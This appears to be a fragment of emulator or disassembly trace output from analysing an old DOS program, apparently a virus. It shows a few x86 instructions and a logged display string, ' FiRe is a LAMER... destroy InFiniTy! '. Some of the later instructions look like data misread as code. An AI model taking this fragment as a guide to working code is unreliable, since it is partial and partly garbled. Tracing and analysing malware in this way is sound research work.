0x12c5b: xor si, si
0x12c5d: mov di, 0x100
0x12c60: push di
0x12c61: xor di, di
0x12c63: ret 0xffff
0x12c66: add cl, byte ptr [di]
0x12c68: or dl, byte ptr [bp + di + 0x4b]
0x12c6b: dec cx
0x12c6c: push bx
2018-12-25T12:30:18.456535117Z 9 PC: 12c54 | Display string (String= ' FiRe is a LAMER... destroy InFiniTy! ')